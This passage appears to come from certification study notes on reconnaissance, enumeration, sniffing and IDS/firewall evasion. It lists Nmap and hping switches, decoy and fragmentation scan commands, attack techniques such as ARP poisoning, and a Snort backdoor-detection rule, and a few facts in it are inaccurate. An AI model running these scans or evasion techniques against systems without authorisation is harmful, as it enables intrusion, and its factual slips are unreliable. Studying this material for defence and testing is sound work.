ECHO Request to the network IP address, ping sweeping 264 | - ICMP Type 3 Code 13 indicates that traffic is being blocked by router or firewall 265 | - ICMP Type 3 Code 3 indicates that the client itself has the port closed 266 | 267 | ##### Message Types 268 | 269 | | ICMP Message Type | Description and Codes | 270 | | :------------------------- | :----------------------------------------------------------------------- | 271 | | 0: Echo Reply | Answer to a Type 8 Echo Request | 272 | | 3: Destination Unreachable | Error message followed by these codes: | 273 | | | 0 - Destination network unreachable | 274 | | | 1 - Destination host unreachable | 275 | | | 2 - protocol unreachable | 276 | | | 3 - port unreachable | 277 | | | 6 - Network unknown | 278 | | | 7 - Host unknown | 279 | | | 9 - Network administratively prohibited | 280 | | | 10 - Host administratively prohibited | 281 | | | 13 - Communication administratively prohibited | 282 | | 4: Source Quench | A congestion control message | 283 | | 5: Redirect | Sent when there are two or more gateways available for the sender to use | 284 | | | 0 - Redirect datagram for the network | 285 | | | 1 - Redirect datagram for the host | 286 | | 8: Echo Request | A ping message, requesting an echo reply | 287 | | 11: Time Exceeded | Packet took too long to be routed \(code 0 is TTL expired\) | 288 | 289 | ##### Ping scanning tools 290 | 291 | - Nmap: virtually always does a ping sweep with scans unless you turn it off 292 | - Angry IP Scanner 293 | - SolarWinds Engineer Toolkit 294 | - Advanced IP Scanner 295 | - Pinkie 296 | 297 | #### Vulnerability Scanning 298 | 299 | - Using complex or simple tools runs against a target to determine vulnerabilities 300 | - Tools 301 | - Nessus: industry standard 302 | - GFI LanGuard 303 | - Qualys 304 | - FreeScan - best known for testing websites and applications 305 | - OpenVAS - best competitor to Nessus and is free 306 | 307 | ### Enumeration 308 | 309 | - Listing the items that are found within a specific target 310 | - Always active by nature 311 | 312 | #### NetBIOS \(Network Basic Input/Output System\) Enumeration 313 | 314 | - NetBIOS provides name servicing, connectionless communication and some Session layer stuff 315 | - NetBIOS is the browser service in Windows designed to host information about all machines within domain or TCP/IP network segment 316 | - NetBIOS name is a **16-character ASCII string** used to identify devices Of those 16 characters, 15 are used for the device name, and the remaining character is reserved for the service name or name record type 317 | - NetBIOS name resolution doesn't work on IPv6 318 | - nbtstat \(on Windows\) 319 | - Local table: `nbtstat -n` 320 | - Remote information: `nbtstat -A ` 321 | - Cache information: `netstat -c` 322 | - Other Tools 323 | - SuperScan 324 | - Hyena 325 | - NetBIOS Enumerator 326 | - NSAuditor 327 | 328 | ##### NetBIOS code and meaning 329 | 330 | | Code | Type | Meaning | 331 | | :--- | :----- | :------------------------ | 332 | | | UNIQUE | Hostname | 333 | | | GROUP | Domain name | 334 | | | UNIQUE | Windows Messenger service | 335 | | | UNIQUE | Domain master browser | 336 | | | GROUP | Domain controller | 337 | | | UNIQUE | Master browser for subnet | 338 | | | UNIQUE | File Service | 339 | 340 | #### SNMP \(Simple Network Management Protocol\) Enumeration 341 | 342 | - Used for network device management and uses both an agent and a manager to ensure logging and control 343 | - Agents are embedded in every network device 344 | - Manager is installed on a separate computer 345 | - There is a read-only and a read-write version 346 | - Default read-only string is **public** 347 | - Default read-write string is **private** 348 | - SNMP uses **community strings** which function as passwords, sent in cleartext unless using SNMP v3 349 | - **Management Information Base** \(MIB\): database that stores information, it uses ASN.1 \(Abstract Syntax Notation One\) 350 | - **Object Identifiers** \(OID\): identifiers for information stored in MIB 351 | - **SNMP GET**: getting information about the system 352 | - **SNMP SET**: setting information about the system 353 | - **Types of objects** 354 | - **Scalar**: single object 355 | - **Tabular**: multiple related objects that can be grouped together 356 | - Tools 357 | - Engineer's Toolset 358 | - SNMPScanner 359 | - OpUtils 5: includes SNMP tools 360 | - SNScan 361 | 362 | #### SMTP \(Simple Mail Transfer Protocol\) Enumeration 363 | 364 | - VRFY: verifying email addresses; code 200 success, code 550 failure 365 | - EXPN: providing actual delivery address of mailing list and aliases 366 | - RCPT TO: defining recipients 367 | 368 | #### NTP \(Network Time Protocol\) Enumeration 369 | 370 | - Querying can give you list of systems connected to the server name and IP 371 | - Tools 372 | - NTP Server Scanner 373 | - AtomSync 374 | - Commands 375 | - ntptrace 376 | - ntpdc 377 | - ntpq 378 | 379 | #### LDAP \(Lightweight Directory Access Protocol\) Enumeration 380 | 381 | - Connecting on 389 to a Directory System Agent \(DSA\) 382 | - Returning information such as valid user names, domain information, addresses, telephone numbers, system data, organization structure and other items, interface with Active Directory \(AD\) 383 | - Tools 384 | - Softerra 385 | - JXplorer 386 | - Lex \(The LDAP Explorer\) 387 | - LDAP Admin Tool 388 | 389 | ### Nmap 390 | 391 | #### Full connect scan 392 | 393 | - `nmap -sT` 394 | - TCP connect or full open scan 395 | - Full connection and then tears down with RST 396 | - Easiest to detect, but most reliable 397 | 398 | #### TCP SYN scan \(Stealth scan\) 399 | 400 | - `nmap -sS` 401 | - Half-open scan or stealth scan 402 | - Only sending SYN packets 403 | - Using abruptly ended connection before the three-way handshake 404 | - Hiding efforts and evading firewalls 405 | 406 | ##### Responses to Full and SYN scan probe 407 | 408 | | Probe Response | Assigned State | 409 | | :----------------- | :------------- | 410 | | TCP SYN/ACK packet | open | 411 | | TCP RST packet | closed | 412 | 413 | #### Inverse TCP flag scan \(FIN, URG and PSH scanning\) 414 | 415 | - Using FIN, URG or PSH flag 416 | - Setting just TCP FIN bit, do FIN scan: `nmap -sF` 417 | 418 | #### NULL scan 419 | 420 | - `nmap -sN` 421 | - TCP flag header is 0, no flag set 422 | - Not working against systems where RFC 793 is not implemented 423 | 424 | #### Xmas scan 425 | 426 | - `nmap -sX` 427 | - All flags \(FIN, PSH and URG\) are turned on so it's "lit up" like a Christmas tree 428 | - Not working against Windows machines 429 | 430 | ##### Responses to NULL, FIN, or Xmas scan 431 | 432 | | Probe Response | Assigned State | 433 | | :------------------------------------------------------------ | :--------------- | 434 | | No response received \(even after retransmissions\) | open or filtered | 435 | | TCP RST packet | closed | 436 | | ICMP unreachable error \(type 3, code 1, 2, 3, 9, 10, or 13\) | filtered | 437 | 438 | #### TCP ACK scan 439 | 440 | - ACK scan: `nmap -sA` 441 | - Window scan: `nmap -sW` 442 | - Probe packets with ACK flag set and a random sequence number to a recipient host 443 | - Multiple methods 444 | - TTL version: If TTL of RST packet < 64, port is open 445 | - Window version: If the Window on RST packet is anything other than 0, port is open 446 | - Can be used to check filtering: If ACK is sent and no response, stateful firewall present 447 | 448 | #### IDLE Scan 449 | 450 | - `nmap -sI ` 451 | - Using a third party \(zombie\) to check if a port is open, exploits a side-channel 452 | - Only working if third party isn't transmitting data, in IDLE state 453 | - IPID gives the information about port open/closed: 454 | - Port closed: IPID increase of 1 455 | - Port open: IPID increase of 2 456 | - IPID increase of anything greater indicates zombie was not idle 457 | 458 | ```text 459 | - Step 1: Sending request to Zombie, getting IPID 460 | SYN/ACK 461 | Attacker -------> Zombie 462 | <------- 463 | RST IPID=x 464 | 465 | - Step 2: Sending a spoofed packet to target, target is responding to Zombie 466 | SYN IP=Zombie 467 | Attacker -------> Target 468 | Zombie <------- Target 469 | SYN/ACK 470 | Zombie -------> Target 471 | RST IPID=x+1 472 | 473 | - Step 3: Sending request to Zombie again, getting IPID 474 | SYN/ACK 475 | Attacker -------> Zombie 476 | <------- 477 | RST IPID=x+2 478 | ``` 479 | 480 | #### Nmap Switches 481 | 482 | | Switch | Description | 483 | | :-------------- | :-------------------------------------------------------------- | 484 | | -sA | ACK scan | 485 | | -sF | FIN scan | 486 | | -sI | IDLE scan | 487 | | -sL | DNS scan \(list scan\) | 488 | | -sN | NULL scan | 489 | | -sO | Protocol scan \(tests which IP protocols respond\) | 490 | | -sP/sn | Ping scan | 491 | | -sS | TCP SYN scan | 492 | | -sT | TCP connect scan, full scan | 493 | | -sW | Window scan | 494 | | -sX | XMAS scan | 495 | | -PE/PP/PM | ICMP ECHO, timestamp, and netmask request discovery probes | 496 | | -P0/PN/Pn | No ping | 497 | | -PS | TCP SYN/ACK to given ports | 498 | | -oN | Normal output | 499 | | -oX | XML output | 500 | | -A | OS detection, version detection, script scanning and traceroute | 501 | | -F | Fast mode - Scan fewer ports than the default scan | 502 | | -f | Fragment packets | 503 | | -S | Spoof source address | 504 | | -O | Enable OS detection | 505 | | -T0 through -T2 | Serial scans. T0 is slowest | 506 | | -T3 through -T5 | Parallel scans. T3 is slowest. T3 is default level | 507 | 508 | ### hping 509 | 510 | - `hping3 -1 ` 511 | - Powerful ping sweep and port scanning tool 512 | - Can craft packets 513 | 514 | #### hping switch and description 515 | 516 | | Switch | Description | 517 | | :------ | :--------------------------------------------------------------------- | 518 | | -1 | Sets ICMP mode | 519 | | -2 | Sets UDP mode | 520 | | -8 | Sets scan mode. Expects port range without -p flag | 521 | | -9 | Listen mode. Expects signature \(e.g. HTTP\) and interface \(-I eth0\) | 522 | | --flood | Sends packets as fast as possible without showing incoming replies | 523 | | -Q | Collects sequence numbers generated by the host | 524 | | -p | Sets port number | 525 | | -F | Sets the FIN flag | 526 | | -S | Sets the SYN flag | 527 | | -R | Sets the RST flag | 528 | | -P | Sets the PSH flag | 529 | | -A | Sets the ACK flag | 530 | | -U | Sets the URG flag | 531 | | -X | Sets the XMAS scan flags | 532 | -------------------------------------------------------------------------------- /04-sniffing_and_evasion.md: -------------------------------------------------------------------------------- 1 | # 04-Sniffing and Evasion 2 | 3 | ## Table of Contents 4 | 5 | - [Sniffing and Evasion](04-sniffing_and_evasion.md#sniffing-and-evasion) 6 | - [Sniffing](04-sniffing_and_evasion.md#sniffing) 7 | - [Basic Knowledge](04-sniffing_and_evasion.md#basic-knowledge) 8 | - [NIC \(Network Interface Card\)](04-sniffing_and_evasion.md#nic-network-interface-card) 9 | - [MAC \(Media Access Control\)](04-sniffing_and_evasion.md#mac-media-access-control) 10 | - [ARP \(Address Resolution Protocol\)](04-sniffing_and_evasion.md#arp-address-resolution-protocol) 11 | - [IPv6](04-sniffing_and_evasion.md#ipv6) 12 | - [Protocols Susceptible](04-sniffing_and_evasion.md#protocols-susceptible) 13 | - [SPAN port \(Switched Port Analyzer\)](04-sniffing_and_evasion.md#span-port-switched-port-analyzer) 14 | - [Wiretapping/Telephone tapping](04-sniffing_and_evasion.md#wiretappingtelephone-tapping) 15 | - [MAC Flooding](04-sniffing_and_evasion.md#mac-flooding) 16 | - [Switch port stealing](04-sniffing_and_evasion.md#switch-port-stealing) 17 | - [DHCP Starvation \(Dynamic Host Configuration Protocol\)](04-sniffing_and_evasion.md#dhcp-starvation-dynamic-host-configuration-protocol) 18 | - [ARP Poisoning](04-sniffing_and_evasion.md#arp-poisoning) 19 | - [STP \(Spanning Tree Protocol\) attack](04-sniffing_and_evasion.md#stp-spanning-tree-protocol-attack) 20 | - [Spoofing](04-sniffing_and_evasion.md#spoofing) 21 | - [IP Spoofing Detection Techniques](04-sniffing_and_evasion.md#ip-spoofing-detection-techniques) 22 | - [Wireshark](04-sniffing_and_evasion.md#wireshark) 23 | - [tcpdump](04-sniffing_and_evasion.md#tcpdump) 24 | - [Other Sniffing Tools](04-sniffing_and_evasion.md#other-sniffing-tools) 25 | - [Evasion](04-sniffing_and_evasion.md#evasion) 26 | - [IDS \(Intrusion Detection System\)](04-sniffing_and_evasion.md#ids-intrusion-detection-system) 27 | - [Types of IDS](04-sniffing_and_evasion.md#types-of-ids) 28 | - [Types of Alerts](04-sniffing_and_evasion.md#types-of-alerts) 29 | - [IPS \(Intrusion Prevention System\)](04-sniffing_and_evasion.md#ips-intrusion-prevention-system) 30 | - [Types of IPS](04-sniffing_and_evasion.md#types-of-ips) 31 | - [Firewall](04-sniffing_and_evasion.md#firewall) 32 | - [Firewall Technologies](04-sniffing_and_evasion.md#firewall-technologies) 33 | - [Types of Firewall](04-sniffing_and_evasion.md#types-of-firewall) 34 | - [Honeypot](04-sniffing_and_evasion.md#honeypot) 35 | - [Evasion Techniques](04-sniffing_and_evasion.md#evasion-techniques) 36 | - [Firewall Evasion](04-sniffing_and_evasion.md#firewall-evasion) 37 | 38 | ## Sniffing and Evasion 39 | 40 | ### Sniffing 41 | 42 | - Capturing packets as they pass on the wire to review for interesting information 43 | - Sniffers operate at OSI Layer 2, upper layers won't be aware of sniffing because OSI layers are designed independently of each other, 44 | - **Passive sniffing**: watching network traffic without interaction; only works for same collision domain, like sniffing through a hub 45 | - **Active sniffing**: using methods to make a switch send traffic to you even though it isn't destined for your machine, like sniffing through a switch-based network 46 | 47 | #### Basic Knowledge 48 | 49 | ##### NIC \(Network Interface Card\) 50 | 51 | - Many wireless NICs have bad support for monitor mode in Windows. Catching general traffic is ok but not controlling packets 52 | - **Promiscuous mode**: NIC must be in this setting to look at all frames passing on the wire 53 | - **Collision Domains** 54 | - Traffic from your NIC, regardless of mode, can only be seen within the same collision domain 55 | - Switch has a collision domain for each port 56 | - Hub has one collision domain by default 57 | 58 | ##### MAC \(Media Access Control\) 59 | 60 | - Physical or burned-in address 61 | - Assigned to NIC for communications at the Data Link layer 62 | - 48 bits long, displayed as 12 hex characters separated by colons 63 | - First half of address is the **organizationally unique identifier**, identifying manufacturer 64 | - Second half ensures no two cards on a subnet will have the same address 65 | 66 | ##### ARP \(Address Resolution Protocol\) 67 | 68 | - Resolves IP address to a MAC address 69 | - Sending a request packet to all the network elements, asking for the MAC address from a specific IP 70 | - Working on a broadcast basis, both requests and replies are broadcast to everyone 71 | - Broadcast destination MAC address: `FF:FF:FF:FF:FF:FF` 72 | - Packets are `ARP_REQUEST` and `ARP_REPLY` 73 | - Stateless, each computer maintains its own ARP cache, which can be poisoned 74 | - ARP command 75 | - Display current ARP cache: `arp -a` 76 | - Clear ARP cache: `arp -d *` 77 | 78 | ##### IPv6 79 | 80 | - 128-bit address \(0000:0000:0000:0000:0000:0000:0000:0000 4x8+7=39 digits\), 8 groups of 4 hexadecimal digits 81 | - Sections with all 0s are shorted to nothing, just having start and end colons 82 | - Double colon can be used only once 83 | - Loopback address is `::1` 84 | 85 | | IPv6 Address Type | Description | 86 | | :---------------- | :---------------------------------------------------- | 87 | | Unicast | Addressed and intended for one host interface | 88 | | Multicast | Addressed for multiple host interfaces | 89 | | Anycast | Large number of hosts can receive; nearest host opens | 90 | 91 | | IPv6 Scopes | Description | 92 | | :---------- | :------------------------------------------------------------------------ | 93 | | Link local | Applies only to hosts on the same subnet \(Address block fe80::/10\) | 94 | | Site local | Applies to hosts within the same organization \(Address block fec0::/10\) | 95 | | Global | Includes everything | 96 | 97 | - Scope applies for multicast and anycast 98 | - Traditional network scanning is **computationally less feasible** 99 | 100 | ##### Protocols Susceptible 101 | 102 | - SMTP is sent in plain text and is viewable over the wire, until SMTPv3 which limits the information you can get, but you can still see it 103 | - SNMP community string, like user id or password 104 | - FTP, TFTP, IMAP, POP3, NNTP \(Network News Transfer Protocol\) and HTTP all send over clear text data 105 | - TCP shows sequence numbers, usable in session hijacking 106 | - TCP and UDP show open ports 107 | - IP shows source and destination addresses 108 | - Telnet and Rlogin show keystrokes including user names and passwords sent in cleartext 109 | 110 | #### SPAN port \(Switched Port Analyzer\) 111 | 112 | - Also known as **Port Mirroring** 113 | - A Cisco switch feature, switch configuration that makes the switch send a copy of all frames from other ports to a specific port 114 | - Not all switches have the ability to do this 115 | - Only listen 116 | - Modern switches sometimes don't allow SPAN ports to send data 117 | 118 | #### Wiretapping/Telephone tapping 119 | 120 | - **Active**: alerting or affecting the communication 121 | - **Passive**: only monitoring or recording the traffic 122 | - **Lawful interception**: legally intercepting communications between two parties for surveillance 123 | 124 | #### MAC Flooding 125 | 126 | - Switches either flood or forward data 127 | - If a switch doesn't know what MAC address is on a port, it will flood the data until it finds out 128 | - MAC Flooding by sending so many MAC addresses to the CAM table that it can't keep up 129 | - MAC Flooding will often destroy the switch before you get anything useful, doesn't last long to get noticed 130 | - Most modern switches protect against this 131 | - **CAM Table** 132 | - The table on a switch that stores which MAC address is on which port 133 | - If table is empty or full, everything is sent to all ports 134 | - Tool: Macof 135 | 136 | #### Switch port stealing 137 | 138 | - Using MAC flooding to sniff packets 139 | - Flooding switch with forged gratuitous ARP packets with target MAC as source, and attacker's MAC as destination 140 | - A race condition of attacker's flooded packets and target host packets will occur, switch has to change MAC address binding constantly 141 | 142 | #### DHCP Starvation \(Dynamic Host Configuration Protocol\) 143 | 144 | - Attempting to exhaust all available addresses from the server, denial-of-service attack 145 | - Attacker sends so many requests that the address space allocated is exhausted 146 | - DHCPv4 packets: DHCPDISCOVER, DHCPOFFER, DHCPREQUEST, DHCPACK 147 | - DHCPv6 packets: Solicit, Advertise, Request \(Confirm, Renew, Rebind\), Reply 148 | - **DHCP Steps** 149 | 1. Client sends DHCPDISCOVER 150 | 2. Server responds with DHCPOFFER 151 | 3. Client sends request for IP with DHCPREQUEST 152 | 4. Server sends address and config via DHCPACK 153 | - Tool: Yersinia 154 | - **Rogue DHCP Server Attack**: setup to offer addresses instead of real server. Can be combined with starvation to real server 155 | - Countermeasures 156 | - To counter DHCP starvation, ussing port security to limit max. number of MAC addresses on switch 157 | - To counter rogue DHCP server attack, configuring DHCP snooping: `ip dhcp snooping` 158 | 159 | #### ARP Poisoning 160 | 161 | - Also called **ARP spoofing** or **gratuitous ARP responses** 162 | - Using special packet to update ARP cache even without a request, used to poison cache on other machines 163 | - Changing the cache of machines so that packets are sent to the attacker instead of the intended target 164 | - Can trigger alerts because of the constant need to keep updating the ARP cache of machines 165 | - **Countermeasures** 166 | - Permanently adding Default gateway MAC into each machine's cache 167 | - Using Dynamic ARP Inspection \(DAI\), DHCP snooping database to prevent MITM 168 | - Using XArp to detect ARP attacks 169 | - Tools 170 | - Cain and Abel 171 | - Ufasoft Snif 172 | - dsniff 173 | 174 | #### STP \(Spanning Tree Protocol\) attack 175 | 176 | - Attacker has access to switch ports that are able to become trunk ports, then introduce a rogue switch spanning tree priority into the network 177 | - Countermeasure: loop protection 178 | 179 | #### Spoofing 180 | 181 | - **MAC Spoofing** 182 | - An address-based authentication attack, changes your MAC address. Benefit is CAM table uses most recent address 183 | - Making switch send all packets to your address instead of the intended one until the CAM table is updated with the real address again 184 | - Port security allows traffic from a specific MAC address to enter to a port 185 | - Port security can slow this down, but doesn't always stop it 186 | - A security feature on switches that allows an administrator to manually assign MAC addresses to a specific port 187 | - Spoofing Tool: Technitium MAC Address Changer 188 | - **Countermeasures** 189 | - DHCP Snooping Binding Table: filters untrusted DHCP messages 190 | - Dynamic ARP Inspection 191 | - IP Source Guard: security feature in switch that restricts IP traffic on untrusted Layer 2 ports by filtering traffic based on DHCP snooping binding database 192 | - Encryption: encrypting communication between AP and computer 193 | - Retrieval of MAC Address: retrieving MAC address from NIC directly instead of from OS 194 | - Implementation of IEEE 802.1X suites: Port-based Network Access Control \(PNAC\), enforces access control when user joins the network 195 | - AAA \(Authentication, Authorization, Accounting\): using AAA server mechanism in order to filter MAC addresses subsequently 196 | - **IRDP \(Internet Router Discovery Protocol\) Spoofing** 197 | - Attacker sends ICMP Router Discovery Protocol messages advertising a malicious gateway 198 | - Passive sniffing, MITM, DoS 199 | - **Countermeasure**: disables IRDP on hosts 200 | - **DNS Poisoning/Spoofing** 201 | - Changing where machines get their DNS information from, allowing attacker to redirect to malicious websites 202 | - **DNS Cache Poisoning**: allowing attacker to replace IP address entries for a target site on a given DNS server with IP address of the server he/she controls 203 | - **DNSSEC**: helping prevent DNS poisoning by encrypting records 204 | 205 | #### IP Spoofing Detection Techniques 206 | 207 | - **Direct TTL Probes** 208 | - Sending packet to host of suspect spoofed packet that triggers reply and compare TTL with suspect packet 209 | - TTL in the reply is not as the same as the packet being checked, it's a spoofed packet 210 | - This technique is successful when the attacker is in a different subnet from that of the victim 211 | - **IP Identification Number** 212 | - Sending probe to host of suspect spoofed traffic that triggers reply and compare the IP ID with suspect traffic 213 | - IP IDs are not close in value to the packet being checked, suspect traffic is spoofed 214 | - This technique is deemed successful even if the attacker is in the same subnet 215 | - **TCP Flow Control Method** 216 | - Attackers sends spoofed TCP packets, will not receive the target's SYN-ACK packets 217 | - Attackers cannot therefore be responsive to change in the congestion window size 218 | - When received traffic continues after a window size is exhausted, most probably the packets are spoofed 219 | 220 | #### Wireshark 221 | 222 | - Previously known as Ethereal 223 | - Can be used to follow streams of data 224 | - Can also filter the packets by specific packet type or specific source address, for example: 225 | - Filter out the noise from ARP, DNS and ICMP requests: `! (arp or icmp or dns)` 226 | - Display HTTP GET requests: `http.request` 227 | - Display TCP segments that contain the word _string_: `tcp contains string` 228 | - Display telnet packets containing that IP: `ip.addr==172.17.15.12 && tcp.port==23` 229 | - Display TCP requests with ACK flag set: `tcp.flags==0x16` 230 | - Display all TCP connections with SYN packets: `tcp.flags.syn==1` 231 | 232 | #### tcpdump 233 | 234 | - Recent version is WinDump \(for Windows\) 235 | - `tcpdump [flag] [interface]` 236 | - Put the interface in listening mode: `tcpdump -i eth1 ` 237 | - `-n` flag to not perform DNS resolution on IP addresses 238 | - `tcptrace` can be used to analyze tcpdump file 239 | 240 | #### Other Sniffing Tools 241 | 242 | - Ettercap: also can be used for MITM attacks, ARP poisoning. Has active and passive sniffing 243 | - Snort: usually discussed as an Intrusion Detection application 244 | - SteelCentral Packet Analyzer 245 | - Capsa Network Analyzer 246 | - OmniPeek 247 | - Observer Analyzer 248 | - Wi.cap. Network Sniffer Pro: mobile network packet sniffer for ROOT ARM droids 249 | - Packet Capture: network traffic sniffer app with SSL decryption 250 | 251 | ### Evasion 252 | 253 | #### IDS \(Intrusion Detection System\) 254 | 255 | - Hardware or software devices that examine streams of packets for malicious behavior 256 | 257 | ##### Types of IDS 258 | 259 | - **Signature based**: comparing packets against a list of known traffic patterns 260 | - **Anomaly based**: making decisions on alerts based on learned behavior and "normal" patterns 261 | - **HIDS** \(Host-based intrusion detection system\): examining specific host-based actions, such as what applications are being used, what files are being accessed and what information resides in the kernel logs 262 | - **NIDS** \(Network-based intrusion detection system\): scanning network traffic, do not use host system resources 263 | - **NBA** \(Network behavior analysis\): examining network traffic to identify threats that generate unusual traffic flows 264 | - **Snort**: a widely deployed IDS that is open source 265 | 266 | - Runs in three different modes 267 | - **Sniffer Mode**: watching packets in real time 268 | - **Packet Logger Mode**: saving packets to disk for review at a later time 269 | - **NIDS Mode**: analyzing network traffic against various rule sets 270 | - Syntax 271 | 272 | - Alert about traffic coming not from an external network to the internal one on port 31337: 273 | 274 | ```text 275 | alert tcp !HOME_NET any -> $HOME_NET 31337 (msg : "BACKDOOR ATTEMPT-Backorifice") 276 | ``` 277 | 278 | - Example output: 279 | 280 | ```text 281 | 10/19-14:48:38.543734 0:48:542:2A:67 -> 0:10:B5:3C:34:C4 type:0x800 len:0x5EA 282 | **xxx -> xxx TCP TTL:64 TOS:0x0 ID:18112 IpLen:20 DgmLen:1500 DF** 283 | ``` 284 | 285 | ##### Types of Alerts 286 | 287 | - **True Positive** \(Attack - Alert\): activity was an attack, IDS identifies as an attack 288 | - **False Positive** \(No Attack - Alert\): activity was acceptable, but IDS identifies as an attack 289 | - **False Negative** \(Attack - No Alert\): activity was an attack, but IDS identifies as an acceptable behavior 290 | - **True Negative** \(No Attack - No Alert\): activity was acceptable, IDS identifies as an acceptable behavior 291 | 292 | #### IPS \(Intrusion Prevention System\) 293 | 294 | - Identifying malicious activity, logs information about this activity, reports it and attempts to block or stops it 295 | 296 | ##### Types of IPS 297 | 298 | - **NIPS** \(Network-based intrusion prevention system\): monitoring the entire network for suspicious traffic by analyzing protocol activity 299 | - **HIPS** \(Host-based intrusion prevention system\): an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host 300 | - **WIPS** \(Wireless intrusion prevention system\): monitoring a wireless network for suspicious traffic by analyzing wireless networking protocols 301 | 302 | #### Firewall 303 | 304 | - An appliance within a network protects internal resources from unauthorized access 305 | - Only uses rules that **implicitly denies** traffic unless it is allowed 306 | - Often uses **network address translation** \(NAT\) which can apply a one-to-one or one-to-many relationship between external and internal IP addresses 307 | - **Bastion Host**: hosts on the screened subnet designed to protect internal resources, using the concept "separation of duties" 308 | - **Screened Subnet**: DMZ, hosts all public-facing servers and services 309 | - **Private zone**: hosts internal hosts that only respond to requests from within that zone 310 | - **Multi-homed**: firewall that has 2 or more interfaces 311 | 312 | ```text 313 | - Single Homed Network: 314 | 315 | Enterprice ---------- ISP 316 | 317 | - Dual Homed Network: 318 | 319 | Enterprice ========== ISP 320 | 321 | - Single Multi-homed Network 322 | 323 | ---------- ISP1 324 | Enterprice 325 | ---------- ISP2 326 | 327 | - Dual Multi-homed Network 328 | 329 | ========== ISP1 330 | Enterprice 331 | ========== ISP2 332 | ``` 333 | 334 | ##### Firewall Technologies 335 | 336 | | OSI | Firewall Technology | 337 | | :-- | :--------------------------------------------------------- | 338 | | 7 | VPN, Application Proxies | 339 | | 6 | VPN | 340 | | 5 | VPN, Circuit-level Gateway | 341 | | 4 | VPN, Packet Filtering | 342 | | 3 | VPN, NAT, Packet Filtering, Stateful Multilayer Inspection | 343 | | 2 | VPN, Packet Filtering | 344 | | 1 | Not Applicable | 345 | 346 | ##### Types of Firewall 347 | 348 | - **Packet-filtering**: only looking at packet headers \(IP address, packet type and port number\), layer 3 Network 349 | - **Circuit-level gateway**: checking TCP handshake, does not filer individual packets, firewall that works on layer 5 Session 350 | - **Application-level gateway**: working like a proxy, allowing specific services in and out, WAF, layer 7 Application 351 | - **Stateful inspection**: combining above 3 types of firewalls, dynamic packet filtering, firewalls that track the entire status of a connection 352 | 353 | #### Honeypot 354 | 355 | - A system setup as a decoy to entice attackers, to research attack methodologies 356 | - Should not include too many open services or look too easy to attack 357 | - **High interaction**: actually running all services and applications and is designed to be completely compromised 358 | - **Medium interaction**: simulating a real OS, applications and its services 359 | - **Low interaction**: simulating a number of services and cannot be completely compromised 360 | - Examples 361 | - Specter 362 | - Honeyd 363 | - KFSensor 364 | 365 | #### Evasion Techniques 366 | 367 | - **Fragmentation**: splitting up packets so that the IDS can't detect the real intent, `nmap -f` 368 | - **Time-To-Live Attack** \(TTL\) 369 | 370 | - Each router along a data path decrements TTL by 1 371 | - TTL reaches 0, package is dropped 372 | - Attacker has a prior knowledge of topology of target network, in order to calculate TTL 373 | - Breaking traffic to fragments, eg: Frag 1, Frag 2, Frag 3 374 | - Sending fragments as below as an exmaple: 375 | 376 | ```text 377 | Attacker NIDS Router Victim 378 | Frag 1 -> Frag 1 -> Frag 1 379 | Frag 2, TTL=1 -> Frag 1, 2 Dropped Frag 1, Waiting 2 380 | Frag 3 -> Frag 1, 2, 3 -> Frag 1, 3 Waiting 2 381 | False Reassembly 382 | Real Frag 2 -> Frag 2 -> Frag 1, 2, 3, Correct Reassembly 383 | ``` 384 | 385 | - **Slow down**: faster scanning such as using nmap's -T5 switch will get you caught. Pros use -T1 switch to get better results 386 | - **Unicode encoding**: working with web requests - using Unicode characters instead of ascii can sometimes get past 387 | - **Network flooding**: triggering alerts that aren't your intended attack so that confuses firewalls/IDS and network admins 388 | - **Insertion Attack**: confusing IDS by forcing it to read invalid packets 389 | - **Spoofing**: can only be used when you don't expect a response back to your machine 390 | - **Source routing**: specifying the path a packet should take on the network; most systems don't allow this anymore 391 | - **IP Address Decoy**: sending packets from your IP as well as multiple other decoys to confuse the IDS/Firewall as to where the attack is really coming from 392 | - `nmap -D RND:10 x.x.x.x` 393 | - `nmap -D decoyIP1,decoyIP2....,sourceIP,.... [target]` 394 | - **Proxy** 395 | - Hiding true identity by filtering through another computer 396 | - Also can be used for other purposes such as content blocking evasion, etc 397 | - **Proxy chains**: chains multiple proxies together 398 | - Proxy Switcher 399 | - Proxy Workbench 400 | - ProxyChains 401 | - **Tor** 402 | - A specific type of proxy that uses multiple hops to a destination 403 | - Endpoints are peer computers 404 | - **Anonymizers**: hiding identity on HTTP traffic \(port 80\) 405 | - Tools 406 | - Nessus: also a vulnerability scanner 407 | - ADMutate: creating scripts not recognizable by signature files 408 | - Whisker: session Splicing 409 | 410 | ##### Firewall Evasion 411 | 412 | - **Firewalking**: going through every port on a firewall to determine what is open 413 | - Firewall type can be discerned by banner grabbing 414 | - The best way around a firewall will always be a compromised internal machine 415 | - **HTTP tunneling**: crafting port 80 segments to carry a payload for protocols the firewall may have, then on other end \(internal machine\) to pull the payload out of all those 80 packets 416 | -------------------------------------------------------------------------------- /05-system_hacking.md: -------------------------------------------------------------------------------- 1 | # 05-System Hacking 2 | 3 | ## Table of Contents 4 | 5 | - [System Hacking](05-system_hacking.md#system-hacking) 6 | - [Windows Security Architecture](05-system_hacking.md#windows-security-architecture) 7 | - [LM Hashing](05-system_hacking.md#lm-hashing) 8 | - [Ntds.dit](05-system_hacking.md#ntdsdit) 9 | - [Kerberos](05-system_hacking.md#kerberos) 10 | - [Registry](05-system_hacking.md#registry) 11 | - [Root Level Keys](05-system_hacking.md#root-level-keys) 12 | - [Types of Registry Values](05-system_hacking.md#types-of-registry-values) 13 | - [Important Locations](05-system_hacking.md#important-locations) 14 | - [Executables](05-system_hacking.md#executables) 15 | - [MMC \(Microsoft Management Console\)](05-system_hacking.md#mmc-microsoft-management-console) 16 | - [Null session](05-system_hacking.md#null-session) 17 | - [Linux Security Architecture](05-system_hacking.md#linux-security-architecture) 18 | - [Important Directories](05-system_hacking.md#important-directories) 19 | - [Important Linux Commands](05-system_hacking.md#important-linux-commands) 20 | - [System Hacking Goals](05-system_hacking.md#system-hacking-goals) 21 | - [Authentication and Password](05-system_hacking.md#authentication-and-password) 22 | - [Three Types of Authentication](05-system_hacking.md#three-types-of-authentication) 23 | - [Types of Password Attacks](05-system_hacking.md#types-of-password-attacks) 24 | - [Non-electronic](05-system_hacking.md#non-electronic) 25 | - [Active online](05-system_hacking.md#active-online) 26 | - [Passive online](05-system_hacking.md#passive-online) 27 | - [Offline](05-system_hacking.md#offline) 28 | - [Privilege Escalation](05-system_hacking.md#privilege-escalation) 29 | - [Types of Privilege Escalation](05-system_hacking.md#types-of-privilege-escalation) 30 | - [Four 